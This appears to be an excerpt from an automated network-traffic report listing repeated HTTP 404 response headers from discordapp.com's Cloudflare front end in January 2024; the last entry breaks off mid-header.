        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:30 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6ca1a2f0605-IADCF-Cache-Status: MISSAccept-Ranges: bytesCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:30 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqhTB1LXLSJArSkskn7kB2Cz2FEf8U7kttMHLDyayzx2-v-tISfzRDpzXreML572QUvUSsX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=0uHQcGFjsTHtnJC8ikBQVuwN16VxgvZiAOjDLyVL_Ag-1704353430-1-AcMmeNleLc5hQznSNHZuQ7/gnQE/WlC9QGWtSbENv0/Nkkdr/i6ElegYmSMC6P/qOoJNoBSil6rNHXfHrrPMRpc=; path=/; expires=Thu, 04-Jan-24 08:00:30 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgmzglu9EPZ8N7mK5yJRoRPN9wWK7Tpq8QiUGaeq91O%2FNHPpHtgRzNmavQu7FlxrQx1tug%2BBDTP%2FUnZVEukZOWBNSmBP3NGt19xezpdZlHSv2%2BB%2BhKmS6RPRiOkGeHR8PHJ1Fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=_j72t_naITz4v0ijOf9.UNvWczbv4tDXRVUJQIwJlWI-1704353430165-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:30 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6cb2f25062f-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 14Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:30 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=mfKDSsPLX6vhdFC6Fex2DhKwXEmQcQ_6L7aKKJB6lkY-1704353430-1-AcLCEG+3cjPP+qMw91lK39DVjTTjp1EI7Ky9B/NUQk/dOO3j48mQ0b+2ladLktmHrNdgIBapmOmOfM59k/0NlXA=; path=/; expires=Thu, 04-Jan-24 08:00:30 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qilDxijVGRacnNQJFoNC%2BbhAnHvB8NZaDCVWDHciPOXx5h02oPpg8D%2FD2uv%2BbMuL72RaFBdTq4L1FTykoAitpmJajIWZzZotpsgTQMYPBlDoqIfk%2BMvrjtbcR8c0ZMJeJ9SBjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=reHgxWgHmFJDoT7lfs6iV7jmgWsy._EBy4VFIiMjfS8-1704353430297-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:32 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6d688022418-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 14Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:32 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Mw0Va0sWMTSZVzWG0TWrVGgnhwsT0MlJ5zUuwMnwe34-1704353432-1-Ae9nuGXdlHeGyLMt63Is+MCFrLTVHFhQChGONEWimamaddvSdnQKqCsO1TD5+m7WafmcGQMw+DRvqAk5/f8+14Y=; path=/; expires=Thu, 04-Jan-24 08:00:32 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ge8DGB69T6ug5dOkKI6MATkF%2BTfvdsBEJbmfHa67%2FkMt9USI44Un%2FCEUZqDKeLjAC3%2Bt%2BasDjSZY3Uk09z51YAxDWW4DJbtI8Aq3azArvmX2I3%2FYmOZUhlehQivIf4lCaAqqtg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=6yIyJ7EU01yTjJGFvTyu._U4HaaYJl0IClKSJAU9sBg-1704353432108-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:32 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6d8cc601729-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 2Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:32 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqhTB1LXLSJArSkskn7kB2Cz2FEf8U7kttMHLDyayzx2-v-tISfzRDpzXreML572QUvUSsX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=S7OcHqbdmlnbfBGwzWY7_p3wKplm05dMNSOFfTpQTJs-1704353432-1-Ad6gPCq/PxSBEJiFB1AfVcFj/QIaUekoulAWHqaZppl7GHmPm9q/XjSnofDXRiQXgrtdV7U4H18uTIl6/RXgcw0=; path=/; expires=Thu, 04-Jan-24 08:00:32 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I5CQIlx4pexWVZmuF3rrBx9H%2B%2F4SqCtqGq%2FWbmOIqYxThagXAOJ88IIzEt9tBaIlgMAE3CYUHHC%2BE1NYVDF%2BlXUnW4m2h%2BRqhzSmexk1Yl%2F%2FTzwbmV5S1vyOt%2BqMZQnhIcdsOA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Fct10JAeij8IrmNjv8Ea5mSiesOZiuPzMT_OApjyzgk-1704353432465-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:34 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6e408d96fec-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 7Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:34 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=_yJ9gnkBc8JQeX1tPVHtd0iStQJJu4hz5A.zyzoCl3c-1704353434-1-ASa0N9qlaAiaJwkzFnDlGbEyeam8j5eNZvgRGR0M3L4ks8DI33LJJmRMTF0lEiFmckTw5YIFQDIAmMpHHXVG3aU=; path=/; expires=Thu, 04-Jan-24 08:00:34 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ipd0USj6LKMUR5xlDdNLVIGIfzz2DToPfUxXkUgAUcNQ15F%2FfGgT6RHrEBv1tJmNWuDItGJuTd2EWek8fdez1DUaQbDNdGSwFl%2B5jDb5y76ccvmUN6XDwg073Ie1Gm618cbOkA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=crlilWgAl4EdQhbPntq2nn11x30KqXCR59b3FrOB7gk-1704353434272-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:34 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6e62a49081c-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 9Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:34 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=yBUSdLotahDgKoDu1U.Nizpa9RQpzpUlo4hcSfQE8Do-1704353434-1-AWbEEuh3f6IXG3taBbjvjIf55ySbeVpaolfk02EcjjWJ6oUabJzCSBQvySiodagTuicqrcfdxcPcu0/OPqjMOO8=; path=/; expires=Thu, 04-Jan-24 08:00:34 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2sdzyUwpouzVqGel5CSVgwfhg5cVzukIoMxR4cSGWPweg0qIsKcyjAnqNwJyO0gPdAWi%2BPyS3DGlueXO2%2BLY5CJyFr%2Bba9UfP0iQQNz0soV0j4hFQ2i3JNVpc0lo2GazFc2XEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=t79nAbKNgMwECRF0fLFn56hBi4uVNduKZhus6FodrAw-1704353434603-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:35 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6edfc73393e-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 10Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:35 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=mAAcljvMvhguJ5.zZvv8TEJ0xL27gWdTZt5HJ9VjqJw-1704353435-1-AYwZQsOX3P86AImcq8JY6t7b+N+DTxqhWACZqndZR7uZ/56HdGSPVZ8DLGJ2JrFqp310PipUMoRr393AquEZrxM=; path=/; expires=Thu, 04-Jan-24 08:00:35 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SGNiFbmXmGjHeQnsACDSFajEFhooHaywbk34RKhc7nuG3cptv%2BvVHviFNh%2F3xue4ueJodO8vspfC1gyQsHBa8A3SQ%2BvWgAookJeaO0HBLsEw59WvoMA4WtB1zQMfhQRjdbEykA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=jWEuyt3_nxh_A_zQpQRJQm.mZzUyIkNV8SXBDRVEpJw-1704353435854-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:36 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6f1997f05ca-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 20Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:36 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=pgJWlPDiUahkAuxdYvzTUFCjPFP9nE6fs7c8sEMm0yo-1704353436-1-ARZQOnUIpDzVdTSRojPTE/LgBAsa+XQ7EoFxtfW+/WY0U+sDUHHmtlGDhnVbjBzdpzzG7JS5nkY1jbaKXfEke1Q=; path=/; expires=Thu, 04-Jan-24 08:00:36 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VAyHtMgaIX4xK0tkmjxDjAJDDsL2PbEv9uZl8qyz2r4NqFEQreoUxfsL7JUOGnlKtejNBG8gCNp%2FGdzxt8D%2BP%2F3ZOLB1gscK%2BRTiCfwi%2FbwUhgOwT9X0WJZBPyWyxdAkkqt1IQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=ciNRJFEkxm0IT2MsII93gp2ZT.Dj20DoFtb_3Xk.OdI-1704353436436-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:38 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6fccfe139b2-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 13Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:38 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=5QcQtROf_C5fGbeF1m5qJ3B2UCaw89FCfs5agePWC6A-1704353438-1-AZH/KEFoXuNfxDGpgXE3/8TKrRxKH0Yw3Z2Coy8DjUNq5105GfdjonPXv+ozhECKWkxEPaTP3GDnEXdFHL5gUgQ=; path=/; expires=Thu, 04-Jan-24 08:00:38 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xkImevqV%2BIM2OybM8X8mN39SyiVCIj%2BtQuHqXaVM62qwMWi6oG8dYCBIKw4OY971zDnDjBfPOGTzd7w9N7khcJwHkWf75NnBI%2FOp8oVcpCi3r5YvVFstJiENhtk3MSQiLAa%2FZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=bAOiUxafqA0ymSwJcCO5pRrLCvadu7_Ph8XTrumgPQg-1704353438267-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:38 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c6ff0af25776-IADCF-Cache-Status: MISSAccept-Ranges: bytesCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:38 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=0AzAPLlSIh6dxJ_6zl4scfdA6d_oj7hk0xPd9_B6CWY-1704353438-1-AUL4cXn1Lm3i/58Dew4rRga2VYiWKmsIhlA6Fv280tGjBpyeLslTQzHH3tYpoRWuy+XSoKvFOhoXbKd/gnHCy0k=; path=/; expires=Thu, 04-Jan-24 08:00:38 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=11gf6VOow1wU3x6utQH2UJn%2FeHexXy5YHxdQkis3y8KxeD3RNdALxrlwUz40XNzDuCpYC%2Bp%2BqFmzRtt7adTwBE%2BNMUFOAQ5kW9dWHDcPKGCvEz7afNi7ys1K72blJnsKlcHHww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=ohNxywSEem63aXIZKw0hBPwxn.d.0HXnx91A3Ucn8Pw-1704353438622-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:40 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c70bdce159c1-IADCF-Cache-Status: MISSAccept-Ranges: bytesCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:40 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPoZOmZ85WzNRXjW2ndttcfb4eP9EIBBMbydtvRdPl58LDIjN51wGDYCvkXSZyQ0wMNTHAX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=dRBTnzdLiYRDgRvQIbpkAInCmejj8wsl4QMDDHjg8z0-1704353440-1-Ac46LoTjc0St/S6xwYjumjV7HYeaTDXprk46e4/7FYIKoF0rlK0AEf6Ju8HhNF/udLVRt3+gzt+QUmjfnJ0tnk0=; path=/; expires=Thu, 04-Jan-24 08:00:40 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P29xPLthzR3TzS9MXmMXX0gd9TSgOcpoJ7mjASrGZTjWtd4skTejN2kLylqpGyYPhA185sMoa8Gxzv9VAH4osYbcRchlXG00uSGzRKdV7UCJVVG%2Fg9%2F%2FATRkJChCS9B1EaDZfw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=UcHXbiiRq3MWis.es5wQVfySX3ErJ0FyJ.7mAWaX4FM-1704353440672-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:40 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c70c8e191fdd-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 22Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:40 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=ET7H22EWY6zV7Ugo.7959nvYK2wqzAsC.7Ph3n1nu.I-1704353440-1-ASTyiGYEhyFWkqo6wp7GMKdR/4SuLwsRlBPrNjCvz4OP50Ql03NkD3IUNl6AAZcYLuh7bK3MwrpaYhUsFmkBX08=; path=/; expires=Thu, 04-Jan-24 08:00:40 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1k%2FmEhAGhWcJGYCk%2FWDGLB6tcG6JTBseGneiar9Hc6UNhsdrEQdj2deCvqNtIH3DN%2Fo6DDdGCctDk6X1wYd8xaWqdvvnaxiM9ZvAtplqcWAF8YQM%2BIDJzyf8YQ8HrMdx%2Bi4TlA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=XEtGludzxuhXy0uMRRxMlf_PXf60jH7Q4m.zPErSHJw-1704353440745-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:42 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c719fca06fb5-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 15Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:42 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=47ZJDCGR9e5It0ixvijNX9lzMK2FhYAX06KkrdWVTK4-1704353442-1-AQ9MDeODe1qTPlgdD1HTfdj7ws4twmzuF3HAm/aDgGkWmjD0jxULp6j/Yo8jdwBiHbvVNCf0JTxbyqw4QHMg5ZA=; path=/; expires=Thu, 04-Jan-24 08:00:42 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3wHCxHgDyxjQLki7eJ44wAYEZGqKUL6Eu4e92mFgFIrlMpjfmp29hSQpjnCjN%2FfO%2BPG7xw%2BGnljZk3Ui9j6fXJd%2BBshpsDwU%2BqVxI3zsb8Di06%2B%2BWtzZsAOUa46B6A%2BfPPNS3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=sMCYlM_Mpw.Y1p0q9.reY5o80ouZAF9.NOVwC585sOg-1704353442900-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:43 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c71acc1281e1-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 16Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:43 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=sbqP4yKr8pmNeO9Cp1Nquva2uwpVYKgp0ncUTRmga50-1704353443-1-ATt4b1rl/8kkmN4cUO7R9Ij8trnE+ael7ThhpXagIKIg4oAe6Dg1hk7lR5EN4s/T+/xNm3Ehgv8oNCOWve33L3I=; path=/; expires=Thu, 04-Jan-24 08:00:43 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QwQPyVAqYCXns5M6NSkTzeRitXIDj5ILWjkA4xn1Tx5CAhfhssRJ%2FqSZIvMKrVMc1zaxyiu36FgplvRenln%2Fv6FA%2B1jtflF6welWagQKNYPpR9L520Hht6dF7nPzHww1dQY9eA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=TQLM7UyXZvbE0tYhvMojh0xbLTuitHsWqiMfckemzdI-1704353443028-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:44 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7265a8c07f4-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 19Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:44 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=bUtI.5J_2PgvkYBV44CX4tIsKVRYCghh2C8AvdTdaoI-1704353444-1-AfVS/AffWb1vGuFHfOdIrtd8vq4n/Fb0vcBwzZMNV4Jp3/DTBesmKafMVgy9rf1P+lu6jVmXgjaAksMuu/wawo8=; path=/; expires=Thu, 04-Jan-24 08:00:44 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4OxfSwUQGlP0OQOwkeEZGjeUugsT4MNCaitrkaZCNq1bnqKgdcW4hzpvXAiZB9Ss2uLwFabZY5hL3KkqLvaYGon97q8rw5241AfKcFIFaSEiDRc4cUm%2BqUnzluWZ4soAZZqBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=ymRGHbgPTC8A7g.9ixp3XwXf1zAqtJoEJ9ICBsnj5Uw-1704353444883-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:45 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7284b977fbb-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 7Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:45 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=JLnun6wzBljTlaA9fa9MYPn54ntzr2uODxjweSmRXdU-1704353445-1-AbUxQwvLVUV+n7xncA4LI5nZs608GWNYQXFRIDdrGPDKSSuh9xaUfLzipDgsmEyQa31pt2iEPEtWi4RSBzdzqss=; path=/; expires=Thu, 04-Jan-24 08:00:45 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p%2Fayb8htspFty3ikJD7W2zDSEbTZAX07wVtqEobum75KzT5ZhjoR8gfpkuxQda2BCtAyf36gRkwzWp5a7zabtXaBpzXzxQaN5sWUAjoO79aBgfsOwUlgSADiHdsdtF%2FfLIn0%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=omO_qHYD0Xy83DHj41sHv6smBaGx3IlWM4zElGewl5Q-1704353445188-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:48 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c739d94c81bb-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 10Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:48 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=zCo_GmtsvRW1avlzgXodEEwmxrtd42m8SvmpllzLeDQ-1704353448-1-AXy0YXlY/uHUFw+tY6sgFdPqya9TWmgB3I6nZ2VgO+ohIi+heTp8mx9cXE/QPvp5otQgLCS2kzrEqsnplGPoykw=; path=/; expires=Thu, 04-Jan-24 08:00:48 GMT; domain=.discordapp.com; HttpOnly; 